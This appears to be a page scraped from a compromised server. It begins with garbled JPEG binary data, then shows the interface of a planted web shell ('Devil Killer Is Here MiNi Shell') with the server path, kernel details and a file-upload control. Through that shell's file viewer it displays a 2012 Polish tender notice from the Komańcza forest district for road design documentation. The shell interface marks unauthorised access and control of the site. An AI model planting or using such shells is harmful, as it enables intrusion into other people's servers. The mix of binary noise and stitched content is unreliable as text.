JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120918/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120918/352894-N-2012.html

<p class="kh_header"><b>Komańcza: Wykonanie dokumentacji projektowej dla inwestycji drogowych w Nadleśnictwie Komańcza, Rymanów, Lesko.</b><br>
<b>Numer ogłoszenia: 352894 - 2012; data zamieszczenia: 18.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Nadleśnictwo Komańcza , Komańcza 125, 38-543 Komańcza, woj. podkarpackie, tel. 013 4677014, 4677331, faks 013 4677014.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_krosno/nadl_komancza/zamowienia_publiczne</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa jednostka organizacyjna nie posiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji projektowej dla inwestycji drogowych w Nadleśnictwie Komańcza, Rymanów, Lesko..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem niniejszego zamówienia jest:Wykonanie dokumentacji projektowej
    dla inwestycji drogowych w Nadleśnictwie Komańcza, Rymanów, Lesko.
    Zamówienie podzielono na 2 odrębne części, dla których należy opracować
    kompletną dokumentację projektową z uzyskaniem niezbędnych w tym zakresie 
    pozwoleń i decyzji, opinii, zaświadczeń i uzgodnień administracyjnych, jeżeli są 
    wymagane przepisami prawa. Sporządzenie dokumentacji służyć będzie do 
    ogłoszenia przetargu na roboty budowlane i musi odpowiadać wymogom 
    określonym w art. 31ustawy Pzp.
2. Szczegółowy opis przedmiotu zamówienia 

1) Przedmiotem zamówienia jest opracowanie kompletnych dokumentacji projektowo-
    kosztorysowych oraz dokonanie wszelkich uzgodnień administracyjnych z 
    uzyskaniem niezbędnych w tym zakresie pozwoleń i decyzji, jeżeli są wymagane
    przepisami prawa dla wyszczególnionych obiektów, z uwzględnieniem poniższego
    zakresu: 
a) wykonanie map do celów projektowych - dla budowy dróg
b) wykonanie badań geotechnicznych gruntu przez uprawnionego geologa dla
    każdej części i poszczególnych w niej zadań zamówienia
c) w razie potrzeby opracowanie operatów wodno-prawnych odpowiadające
    wymogom ustawy z dnia 18.07.2001 r. Prawo wodne (Dz. U. z 2005 r. nr 239 poz.
    2019 z późn.zm.) wraz z niezbędnymi uzgodnieniami oraz uzyskanie pozwolenia
    wodno-prawnego. 
d) wykonanie projektu budowlanego - w zakresie określonym w rozporządzeniu
    Ministra Infrastruktury z dnia 3.07.2003 r. (Dz.U. nr 120 poz.1133 z późn. zm.) w
    sprawie szczegółowego zakresu i formy projektu budowlanego stanowiącego
    podstawę do wydania decyzji o pozwoleniu na budowę, 
e) wykonanie projektu wykonawczego - dla każdej części i poszczególnych w niej
    zadań zamówienia - opracowanie uzupełnione szczegółami umożliwiającymi 
    wykonanie zamówienia bez konieczności dodatkowych opracowań i precyzujące 
    warunki wykonania i odbioru danego zakresu robót w formie opisowej i rysunkowej 
    w zakresie i stopniu dokładności niezbędnym do sporządzenia przedmiaru robót, 
    kosztorysu inwestorskiego, przygotowania oferty przez wykonawcę i realizacji robót 
    budowlanych wykonane zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 
    02.09.2004r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, 
    specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu 
    funkcjonalno-użytkowego (Dz. U. z 2004 r. nr 202 poz. 2072 z późn. zm.) 
f)  opracowanie specyfikacji technicznych wykonania i odbioru robót
    budowlanych w zakresie i formie określonej w rozporządzeniu Ministra
    Infrastruktury z dnia 2.09.2004 r. (Dz. U. nr 202 poz. 2072 z późn. zm.) 
g) sporządzenie przedmiaru robót wg ustaleń określonych w rozporządzeniu
    Ministra Infrastruktury z dnia 2.09.2004 r. (Dz. U. nr 202 poz. 2072 z późn. zm.) 
h) wykonanie kosztorysu inwestorskiego zgodnie z ustawą Pzp i Rozporządzeniem
    Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw
    sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac
    projektowych oraz planowanych kosztów robót budowlanych określonych w
    programie funkcjonalno-użytkowym (Dz. U. z 2004 r. nr 130 poz. 1389).
    W razie konieczności - aktualizacja kosztorysu inwestorskiego w okresie 3 lat od
    daty ich przekazania zamawiającemu. Wykonawca winien w cenie oferty zawrzeć
    koszt 1 aktualizacji dla każdego zadania. 
i)  opracowanie informacji o bezpieczeństwie i ochronie zdrowia zgodnie z
    wymogami rozporządzenia Ministra Infrastruktury z dnia 23.06.2003 r. (Dz. U. nr
    120 poz. 1126 z późn. zm.) 
j)  w razie potrzeby sporządzenie raportu oddziaływania przedsięwzięcia na
    środowisko zgodnie z ustawą z dnia 3 października 2008 r. o udostępnianiu
    informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie
    środowiska oraz o ocenach oddziaływania na środowisko Dz. U. z 2010 r. Nr 28,
    poz. 145; przepisami: Dyrektywy 85/337/EWG, Dyrektywy 92/43/EWG, Dyrektywy
    79/409/EWG, Ramową Dyrektywą Wodną 2000/60/WE, innymi aktami prawa
    krajowego i wspólnotowego obowiązującymi na dzień oddania Zamawiającemu
    Raportu o oddziaływaniu na środowisko (3 egzemplarze - Raportu o oddziaływaniu
    przedsięwzięcia na środowisko, 1 egzemplarz - całość opracowania w wersji 
    elektronicznej na płytach CD/DVD (pliki z rozszerzeniem *pdf lub *doc, tożsame z
    wersją pisemną i zapisane w wersji tylko do odczytu). 
2) Wystąpienie w imieniu Zamawiającego do właściwych organów z wnioskami o
    wydanie pozwoleń budowlanych oraz uzyskanie innych wymaganych prawem
    decyzji, pozwoleń i uzgodnień (między innymi decyzji środowiskowych, pozwoleń
    wodnoprawnych). 
3) W trakcie opracowania projektu należy uwzględnić wszelkie przepisy prawa
    dotyczące projektowanych obiektów oraz odnoszące się do zakresu i formy projektu
    budowlanego. Oprócz sporządzenia dokumentów oraz przeprowadzenia
    postępowań, o których mowa powyżej, zamówienie obejmuje także uzgodnienia z
    podmiotami wykonującymi prawa właścicielskie do wód. 
4) Wykonawca powinien zastosować w projekcie rozwiązania standardowe, skutkujące
    optymalizacją kosztów budowy i eksploatacji; rozwiązania koncepcyjne i
    architektoniczno-budowlane oraz specyfikacje techniczne wykonania i
    odbioru robót wymagają akceptacji Zamawiającego. 
5) W dokumentacji projektowej zabrania się opisywania materiałów i urządzeń za
    pomocą znaków towarowych, patentów lub pochodzenia, chyba, że jest to
    uzasadnione specyfiką przedmiotu i Wykonawca nie może opisać przedmiotu
    zamówienia za pomocą dostatecznie dokładnych określeń, a wskazaniu takiemu
    towarzyszą wyrazy lub równoważny oraz należy podać minimalne parametry jakimi
    rozwiązanie winno się charakteryzować. 
6) Dokumentację projektową Wykonawca dostarczy w 5 egzemplarzach oraz w formie
    elektronicznej na płytach CD, w postaci plików ogólnodostępnych (formaty: .doc,
   .xls, .pdf; inne pliki po uzgodnieniu z Zamawiającym). 
7) Całość zamówienia Wykonawca zrealizuje z własnych materiałów, własnym
    staraniem i na własny koszt (np. opłaty skarbowe do wniosków o wydanie decyzji,
    pozwoleń, za pełnomocnictwa, wypisy, wyrysy, mapy) itp. 
8) Przed złożeniem ofert zaleca się dokładne zapoznanie z przedmiotem zamówienia,
    łącznie z lokalizacją planowanych obiektów na gruncie. Koszt wizji lokalnej ponosi
    Wykonawca. 
9) Data uzyskania prawomocnej decyzji o pozwoleniu na budowę lub zaświadczenia
    właściwego organu o braku sprzeciwu do wykonywania robót budowlanych lub w
    przypadku wymagania obu dokumentów data ostatniego, stanowi podstawę do
    zgłoszenia usługi do odbioru . 
10) Przy wykonywaniu prac Wykonawca winien uwzględnić obowiązujące w tym
    zakresie przepisy, a w szczególności: 
    Ustawę z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz. U. z 2010 r. Nr
    113 poz. 759 z późn. zm.), Ustawę z dnia 7 lipca 1994 r. Prawo budowlane( Dz. U.
    z 2010 r. Nr 234, poz. 1623 z późn. zm.), inne nie wymienione obowiązujące akty
    prawne oraz instrukcje techniczne, normy. 
11) Ponadto winien zastosować w projekcie zalecenia zawarte w poradniku
    technicznym Drogi leśne (Warszawa - Bedoń 2006) - dostępny na stronie
    internetowej: http://www.lasy.gov.pl/dokumenty/drogi_lesne/view )
   		 
12) Dodatkowo sporządzona dokumentacja musi być zaopatrzona w 
   oświadczenia: 
   a) oświadczenie, że dokumentacja została wykonana zgodnie z umową i
   obowiązującymi w kraju normami oraz aktualnymi przepisami. 
   b) oświadczenie, że dokumentacja jest kompletna z punktu widzenia celu, któremu
   ma służyć i nadaje się do realizacji. 
13) Wykonawca jest zobowiązany udzielić na wykonaną dokumentację projektowo-
    kosztorysową gwarancji na okres minimum 24 miesięcy obejmującej również
    niekompletność opracowania objętego niniejszą umową lub rozwiązania projektu
    niezgodne z obowiązującymi przepisami i normami. Gwarancja liczona jest od dnia
    całkowitego końcowego odbioru dokumentacji projektowej. Okres gwarancji w
    przypadku wad ujawnionych ulega wydłużeniu o czas usunięcia wad..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt. 6 ustawy, polegających na powtórzeniu prac będących przedmiotem zamówienia lub jego części o wartości do 50% wartości zamówienia podstawowego(wartości umowy) w okresie 3 lat od udzielenia zamówienia podstawowego(od terminu podpisania umowy).</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.24.20.00-6, 71.32.00.00-7, 71.32.20.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> WYMAGANIA DOTYCZĄCE WADIUM  
1. Wykonawca składający oferty częściowe jest zobowiązany do wniesienia wadium:
- dla CZĘŚCI NR 1 - 6 000,00zł (słownie: sześć tysięcy złotych 00/100),
- dla CZĘŚCI NR 2 - 3 000,00zł (słownie: trzy tysiące złotych 00/100).
    2.Wadium może być wnoszone w jednej lub kilku  następujących formach: 
a) pieniądzu; 
Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek wskazany przez Zamawiającego;
Numer rachunku bankowego na który należy wnosić wadium: 
         BGŻ S.A. O/SANOK 90203000451110000000778850
     z dopiskiem na blankiecie przelewu, jakiego postępowania dotyczy,
b)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c) gwarancjach bankowych,
d) gwarancjach ubezpieczeniowych,
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.).
3. Wadia wnoszone w innych formach niż pieniądz należy przekazać Zamawiającemu w terminie do dnia 26.09.2012r. do godziny 10:00 Wadium złożone w formie gwarancji, poręczeń winno być bezwarunkowo płatne na pierwsze żądanie Zamawiającego. Gwarancja winna być nieodwołalna i bezwarunkowa. Z treści gwarancji (poręczenia) musi jednoznacznie wynikać, jaki jest sposób reprezentacji Gwaranta (poręczyciela). Poręczenie, gwarancja musi być podpisana przez upoważnionego (upełnomocnionego) przedstawiciela Gwaranta (poręczyciela). Podpis winien być sporządzony w sposób umożliwiający jego identyfikację np. złożony wraz z imienną pieczątką lub czytelny (z podaniem imienia i nazwiska). Z treści gwarancji winno wynikać bezwarunkowe zobowiązanie Gwaranta do wpłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4 a i ust. 5 ustawy Pzp, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą.

4. Wadium musi być wniesione najpóźniej do wyznaczonego terminu składania ofert tj. do dnia 26.09.2012r. do godz. 10:00 Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie, wyznaczonym jako termin składania ofert, znajdzie się na rachunku bankowym Zamawiającego. Zamawiający będzie uważał za skuteczne tylko wówczas, gdy bank prowadzący rachunek Zamawiającego potwierdzi, że otrzymał taki przelew przed upływem terminu składania ofert.

5. Wykonawca, który nie wniesie wadium zostanie wykluczony z postępowania, a jego oferta zostanie uznana za odrzuconą.
a)Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza. 
Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.
  b)Zamawiający niezwłocznie zwraca wadium na wniosek Wykonawcy który wycofał ofertę przed upływem terminu składania ofert,
  c)Wadium Wykonawcy zostanie zatrzymane wraz z odsetkami w przypadku, gdy Wykonawca:
- w odpowiedzi na wezwanie, o którym mowa w art. 26 ust.  3 nie złożył dokumentów lub oświadczeń, o których mowa w art.  25 ust. 1 lub pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn  nie leżących po jego stronie,
- odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie, 
- nie wniósł zabezpieczenia należytego wykonania umowy,
- zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie złożonego Oświadczenia o spełnieniu warunków udziału w postępowaniu -załącznik nr 2 do SIWZ. Ocena spełnienia warunków udziału w postępowania dokonana zostanie w systemie spełnienia/nie spełnienia na podstawie załączonych przez Wykonawcę do oferty dokumentów i oświadczeń.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia powyższego warunku Wykonawcy przedstawią wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług w zakresie niezbędnym do wskazania spełnienia warunku wiedzy i doświadczenia w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonanie co najmniej 1 projektu budowlanego, przebudowy lub budowy drogi, o wartości minimum 20 000 zł brutto, z podaniem daty wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że usługa została wykonana lub jest wykonywana należycie. W przypadku składania oferty przez Wykonawców występujących wspólnie warunek mogą oni spełnić łącznie. Ocena spełnienia warunków udziału w postępowania dokonana zostanie w systemie spełnienia/nie spełnienia na podstawie załączonych przez Wykonawcę do oferty dokumentów i oświadczeń.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie dysponowania odpowiednim potencjałem Zamawiający uzna warunek za spełniony na podstawie złożonego Oświadczenia o spełnieniu warunków udziału w postępowaniu -załącznik nr 2 do SIWZ. Ocena spełnienia warunków udziału w postępowania dokonana zostanie w systemie spełnienia/nie spełnienia na podstawie załączonych przez Wykonawcę do oferty dokumentów i oświadczeń.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże i udokumentuje, iż dysponuje lub będzie dysponował minimum jedną osobą posiadającą uprawnienia budowlane w specjalności drogowej lub inne ważne uprawnienia budowlane uprawniające do projektowania dróg w zakresie obejmującym przedmiot zamówienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów. 
Dopuszcza się wykazanie spełnienia niniejszego warunku poprzez przedstawienie osób posiadających uprawnienia budowlane w specjalnościach inaczej nazwanych lecz wyłącznie takich, które uprawniają do wykonywania tych samych czynności, do których uprawniają uprawnienia budowlane w specjalnościach wymienionych w odpowiednich warunkach. 
Przez uprawnienia budowlane do projektowania rozumie się uprawnienia do sprawowania samodzielnych funkcji technicznych w budownictwie, wydane na podstawie ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2010 r. Nr 243 poz. 1623, ze zm.) oraz rozporządzenia ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. Nr 83, poz. 578), albo odpowiadające im inne ważne uprawnienia budowlane wydane na mocy wcześniej obowiązujących przepisów. 
W przypadku, gdy wskazane przez wykonawcę osoby są obywatelami państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej muszą one spełniać wymogi określone w art. 12 a ustawy z dnia 7 lipca 1994 r. - Prawo budowlane (tj. Dz. U. z 2010 r. Nr 243 poz. 1623, ze zm.) 
W celu potwierdzenia spełnienia warunku dysponowania odpowiednimi osobami, Wykonawca zobowiązany jest przedłożyć wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, sporządzony według propozycji Zamawiającego, stanowiący załącznik nr 4 do SIWZ oraz oświadczenie sporządzone według propozycji Zamawiającego, stanowiące załącznik nr 5 do SIWZ, że osoby które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia. 
Ocena spełnienia warunków udziału w postępowania dokonana zostanie w systemie spełnienia/nie spełnienia na podstawie załączonych przez Wykonawcę do oferty dokumentów i oświadczeń.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki, dotyczące sytuacji ekonomicznej i finansowej, poprzez posiadanie opłaconej polisy, na sumę nie niższą niż 15 000 zł brutto, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia. Ocena spełnienia warunków udziału w postępowania dokonana zostanie w systemie spełnienia/nie spełnienia na podstawie załączonych przez Wykonawcę do oferty dokumentów i oświadczeń.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Kompletna oferta musi zawierać: 
a) Formularz Oferty sporządzony na podstawie wzoru stanowiącego załącznik nr 1 do niniejszej SIWZ, 
b) stosowne Pełnomocnictwo(a) - w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru, 
c) w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego.
2. W przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej Wykonawców, oświadczenie może być złożone przez każdego z Wykonawców składających ofertę wspólną, jeżeli każdy z nich spełnia wszystkie warunki samodzielnie albo, bez względu na to, czy spełniają wszystkie warunki samodzielnie lub łącznie, oświadczenie może być złożone wspólnie przez wszystkich Wykonawców, to znaczy, że na oświadczeniu należy wypisać wszystkich Wykonawców i podpisują je wszyscy upełnomocnieni przedstawiciele Wykonawców lub podpisuje je pełnomocnik ustanowiony przez Wykonawców, wspólnie ubiegających się o udzielenie zamówienia. Ustanowienie pełnomocnika jest obowiązkowe. 3. W przypadku, gdy złożone przez Wykonawcę dokumenty zawierają dane w innych walutach niż określono to w treści SIWZ, Zamawiający jako kurs przeliczeniowy waluty przyjmie średni kurs NBP w dniu: 
- wystawienia dokumentu potwierdzającego spełnianie warunku sytuacji ekonomicznej i finansowej
